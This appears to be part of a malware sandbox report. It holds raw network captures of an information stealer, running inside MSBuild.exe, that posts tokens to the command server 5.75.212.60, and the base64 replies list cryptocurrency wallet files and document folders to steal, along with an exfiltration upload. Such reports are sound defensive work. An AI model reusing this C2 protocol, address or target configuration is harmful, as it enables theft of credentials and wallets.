                                                                                      2024-07-26 01:18:17 UTC16384INData Raw: 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24
                                                                                      Data Ascii: 8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$
                                                                                      2024-07-26 01:18:17 UTC16384INData Raw: 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff
                                                                                      Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
                                                                                      2024-07-26 01:18:17 UTC16384INData Raw: e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74
                                                                                      Data Ascii: `P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rtt
                                                                                      2024-07-26 01:18:17 UTC16384INData Raw: 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00
                                                                                      Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      18192.168.2.4497545.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:18:19 UTC323OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----ECBGHCGCBKFIECBFHIDG
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 1145
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:19 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 48 43 47 43 42 4b 46 49 45 43 42 46 48 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 48 43 47 43 42 4b 46 49 45 43 42 46 48 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 48 43 47 43 42 4b 46 49 45 43 42 46 48 49 44 47 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------ECBGHCGCBKFIECBFHIDGContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------ECBGHCGCBKFIECBFHIDGContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------ECBGHCGCBKFIECBFHIDGCont
                                                                                      2024-07-26 01:18:20 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:20 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:18:20 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2ok0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      19192.168.2.4497555.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:18:20 UTC322OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----GDGHJEHJJDAAAKEBGCFC
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 331
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:20 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------GDGHJEHJJDAAAKEBGCFCContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------GDGHJEHJJDAAAKEBGCFCContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------GDGHJEHJJDAAAKEBGCFCCont
                                                                                      2024-07-26 01:18:21 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:21 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:18:21 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                      Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      20192.168.2.4497565.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:18:22 UTC322OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----DHJJEGHIIDAFIDHJDHJE
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 331
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:22 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 4a 45 47 48 49 49 44 41 46 49 44 48 4a 44 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4a 45 47 48 49 49 44 41 46 49 44 48 4a 44 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4a 45 47 48 49 49 44 41 46 49 44 48 4a 44 48 4a 45 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------DHJJEGHIIDAFIDHJDHJEContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------DHJJEGHIIDAFIDHJDHJEContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------DHJJEGHIIDAFIDHJDHJECont
                                                                                      2024-07-26 01:18:22 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:22 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:18:22 UTC131INData Raw: 37 38 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 5a 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 78RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp8ZGVza3RvcHwlREVTS1RPUCVcfCoudHh0fDUwfGZhbHNlfCp3aW5kb3dzKnw=0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      21192.168.2.4497575.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:18:23 UTC322OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----DAECFIJDAAAKECBFCGHI
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 457
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:23 UTC457OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------DAECFIJDAAAKECBFCGHIContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------DAECFIJDAAAKECBFCGHIContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------DAECFIJDAAAKECBFCGHICont
                                                                                      2024-07-26 01:18:24 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:24 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-07-26 01:18:24 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2ok0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      22192.168.2.4497585.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:18:25 UTC324OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----HIIIEGDBKJKEBGCBAFCF
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Content-Length: 98617
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:25 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 64 32 36 30 63 31 62 33 35 35 65 66 64 63 36 33 32 65 37 62 64 65 37 37 62 33 36 36 61 39 64 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 62 37 31 64 38 39 64 33 65 65 63 61 63 34 63 30 33 63 31 36 39 38 62 62 65 31 36 64 36 64 32 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------HIIIEGDBKJKEBGCBAFCFContent-Disposition: form-data; name="token"7d260c1b355efdc632e7bde77b366a9d------HIIIEGDBKJKEBGCBAFCFContent-Disposition: form-data; name="build_id"cb71d89d3eecac4c03c1698bbe16d6d2------HIIIEGDBKJKEBGCBAFCFCont
                                                                                      2024-07-26 01:18:25 UTC16355OUTData Raw: 69 69 6b 41 6c 46 4c 52 69 67 42 4b 53 6c 70 4b 42 68 51 61 4b 4b 59 78 4b 4b 57 69 6b 41 6c 46 4c 69 6b 6f 41 53 69 6c 70 4b 42 69 55 55 74 4a 51 4d 4b 53 6c 70 44 51 41 55 6c 4c 52 54 41 53 6b 4e 4c 52 51 4e 43 55 47 69 6a 46 41 78 4b 4b 57 6b 6f 41 4b 53 6c 70 4b 59 78 4b 51 30 36 6b 6f 47 4a 52 53 30 6c 41 78 4b 4b 57 6b 49 6f 41 53 67 30 55 55 61 44 45 6f 6f 6f 6f 47 4a 53 55 36 6b 78 52 63 42 4b 53 6e 59 70 70 6f 47 46 4a 53 30 55 44 47 6d 69 6c 70 4b 42 68 32 70 4b 58 46 4a 69 67 59 6c 4a 54 71 54 46 49 42 4b 53 6c 36 30 6c 41 78 4f 39 4a 32 70 31 49 52 51 55 49 61 53 6e 47 6b 49 6f 47 4e 36 47 69 6c 4e 4a 31 6f 41 54 72 53 45 55 37 47 4b 61 52 51 55 46 49 65 52 53 34 70 50 6f 4d 55 41 46 4a 53 34 35 7a 52 51 4d 62 52 53 30 6e 66 2b 74 41 78 44 79
                                                                                      Data Ascii: iikAlFLRigBKSlpKBhQaKKYxKKWikAlFLikoASilpKBiUUtJQMKSlpDQAUlLRTASkNLRQNCUGijFAxKKWkoAKSlpKYxKQ06koGJRS0lAxKKWkIoASg0UUaDEooooGJSU6kxRcBKSnYppoGFJS0UDGmilpKBh2pKXFJigYlJTqTFIBKSl60lAxO9J2p1IRQUIaSnGkIoGN6GilNJ1oATrSEU7GKaRQUFIeRS4pPoMUAFJS45zRQMbRS0nf+tAxDy
                                                                                      2024-07-26 01:18:25 UTC16355OUTData Raw: 6a 4b 6b 73 4b 38 47 33 70 65 36 39 65 71 2b 66 39 62 6e 4a 5a 72 6f 66 42 45 38 73 58 69 2b 78 45 52 2b 2b 7a 49 77 39 56 4b 6e 50 2b 50 34 55 79 62 77 50 34 6a 68 6e 38 72 2b 7a 6e 66 6e 41 64 48 55 71 66 78 7a 78 2b 4e 64 4e 34 65 30 4f 50 77 72 4f 62 6e 55 4a 59 6e 31 5a 34 7a 35 4e 74 47 64 33 6c 4b 65 72 4e 2f 4c 2f 48 74 39 62 6d 4f 59 59 61 6a 68 5a 7a 6c 4a 4e 57 5a 6e 68 63 4e 57 6c 57 69 72 57 31 4e 4b 36 43 70 65 54 49 76 33 56 6b 59 44 36 5a 72 41 38 53 41 47 77 69 50 63 53 67 66 6f 61 31 79 78 4a 4a 4a 79 54 79 61 35 2f 77 41 52 7a 67 74 44 41 44 30 79 37 66 30 2f 72 58 35 4e 77 7a 47 56 62 4f 4b 54 68 30 62 66 6f 72 50 2f 41 49 59 2b 6f 34 68 6e 47 6c 6c 6c 54 6d 36 70 4c 35 33 52 68 55 6e 4e 4c 52 58 37 57 66 6b 59 55 55 55 55 41 65 72 4d
                                                                                      Data Ascii: jKksK8G3pe69eq+f9bnJZrofBE8sXi+xER++zIw9VKnP+P4UybwP4jhn8r+znfnAdHUqfxzx+NdN4e0OPwrObnUJYn1Z4z5NtGd3lKerN/L/Ht9bmOYYajhZzlJNWZnhcNWlWirW1NK6CpeTIv3VkYD6ZrA8SAGwiPcSgfoa1yxJJJyTya5/wARzgtDAD0y7f0/rX5NwzGVbOKTh0bforP/AIY+o4hnGlllTm6pL53RhUnNLRX7WfkYUUUUAerM
                                                                                      2024-07-26 01:18:25 UTC16355OUTData Raw: 47 6d 47 6e 63 39 4f 31 4e 4a 35 6f 62 4e 45 4a 6e 67 34 70 75 66 78 70 54 30 70 70 36 35 71 47 55 67 7a 54 63 2b 6c 42 50 50 65 6b 49 71 53 68 44 36 30 6e 4e 4b 65 6c 4a 79 50 77 71 57 55 68 42 31 35 70 44 37 30 6f 35 6f 49 46 53 4d 54 39 4b 53 6a 71 66 65 67 6e 2f 49 70 44 45 50 4e 49 61 4d 55 6d 61 51 37 42 31 50 38 41 53 6b 50 54 4e 48 2b 65 61 4f 31 49 6f 39 41 6f 6f 6f 72 41 2b 55 47 6e 7a 79 63 51 32 47 6f 58 4f 4f 70 74 62 4f 53 59 44 38 56 55 6a 4e 52 4f 2b 6f 72 30 38 4e 2b 49 57 2b 6d 6c 54 66 31 57 74 2f 77 39 71 72 36 56 66 69 55 5a 61 49 6b 43 52 42 33 48 2b 4e 65 75 57 38 30 64 7a 41 6b 30 54 68 34 33 47 56 59 64 78 58 7a 56 62 4f 61 6b 63 52 4f 68 47 33 75 73 2b 77 77 6e 44 74 43 70 68 61 65 49 6d 33 37 79 2f 72 6f 65 41 47 66 56 42 30 38
                                                                                      Data Ascii: GmGnc9O1NJ5obNEJng4pufxpT0pp65qGUgzTc+lBPPekIqShD60nNKelJyPwqWUhB15pD70o5oIFSMT9KSjqfegn/IpDEPNIaMUmaQ7B1P8ASkPTNH+eaO1Io9AooorA+UGnzycQ2GoXOOptbOSYD8VUjNRO+or08N+IW+mlTf1Wt/w9qr6VfiUZaIkCRB3H+NeuW80dzAk0Th43GVYdxXzVbOakcROhG3us+wwnDtCphaeIm37y/roeAGfVB08
                                                                                      2024-07-26 01:18:25 UTC16355OUTData Raw: 6f 49 54 78 53 48 38 61 4f 6e 65 69 6b 55 68 74 42 34 50 61 67 6e 42 6f 6f 4b 41 2b 35 78 54 65 6c 4f 70 76 66 69 6b 4d 4f 2f 4e 42 50 48 2b 46 41 4e 49 65 66 65 6b 41 6e 35 55 6d 66 71 66 65 6c 70 4d 55 46 42 39 61 51 6a 36 55 76 58 38 36 51 2b 39 41 43 44 6e 32 39 36 4b 41 4f 61 42 79 61 42 69 64 42 52 51 54 6e 36 55 47 67 5a 36 4c 52 52 52 57 5a 38 67 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 43 69 69 69 69 6b 41 55 55 55 55 41 46 46 46 46 4d 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 45 6f 6f 6f 6f 41 4b 4b 58 74 53 55 41 46 46 46 46 41 43 55 55 74 46 41 78 4b 4b 4b 4f 4b 41 43 69 6c 6f 70 67 4a 52 53 30 55 41 4a 52 53 30 55 41 4a 52 52 69 69 67 41 6f 78 52 7a 52 51 41 59 6f 6f 6f 6f 41 4b 4d 55 59 6f 6f 41 53 69 6c 2f 47 6a 6a 31 6f 75 4d
                                                                                      Data Ascii: oITxSH8aOneikUhtB4PagnBooKA+5xTelOpvfikMO/NBPH+FANIefekAn5UmfqfelpMUFB9aQj6UvX86Q+9ACDn296KAOaByaBidBRQTn6UGgZ6LRRRWZ8gFFFFABRRRQAUUUUAFFFFACiiiikAUUUUAFFFFMAooooAKKKKAEooooAKKXtSUAFFFFACUUtFAxKKKOKACilopgJRS0UAJRS0UAJRRiigAoxRzRQAYooooAKMUYooASil/Gjj1ouM
                                                                                      2024-07-26 01:18:25 UTC16355OUTData Raw: 59 33 41 6b 69 33 41 66 63 62 4f 52 77 63 67 6b 65 76 74 54 78 71 70 61 34 69 68 6d 73 37 6d 32 6e 59 6b 42 5a 46 79 72 63 5a 34 64 63 72 30 42 34 79 44 37 56 59 76 46 6c 4b 4e 4a 48 49 69 2b 55 75 38 5a 51 6b 35 47 66 66 75 4f 4b 7a 39 68 47 45 31 4c 6c 56 31 71 6d 65 71 35 71 70 42 78 62 75 6e 6f 7a 7a 66 78 50 6f 4d 4f 68 54 32 36 77 7a 53 53 4c 4b 72 48 35 77 4d 6a 47 50 54 36 31 67 31 32 6e 78 44 2f 34 2b 62 44 2f 63 66 2b 59 72 69 36 2b 77 77 4e 53 56 54 44 78 6c 4a 33 66 2f 41 41 54 38 38 7a 57 6c 43 6a 69 35 77 70 71 79 56 76 79 51 55 55 55 56 32 48 6e 68 56 53 34 76 37 57 46 6e 69 6b 6c 77 34 48 54 61 54 56 75 71 32 69 36 52 59 36 39 34 33 47 6d 33 38 6b 30 63 63 36 6e 61 30 4c 41 48 63 45 79 4f 6f 50 6f 61 7a 72 53 55 61 62 63 74 72 48 64 6c 31
                                                                                      Data Ascii: Y3Aki3AfcbORwcgkevtTxqpa4ihms7m2nYkBZFyrcZ4dcr0B4yD7VYvFlKNJHIi+Uu8ZQk5GffuOKz9hGE1LlV1qmeq5qpBxbunozzfxPoMOhT26wzSSLKrH5wMjGPT61g12nxD/4+bD/cf+Yri6+wwNSVTDxlJ3f/AAT88zWlCji5wpqyVvyQUUUV2HnhVS4v7WFniklw4HTaTVuq2i6RY6943Gm38k0cc6na0LAHcEyOoPoazrSUabctrHdl1
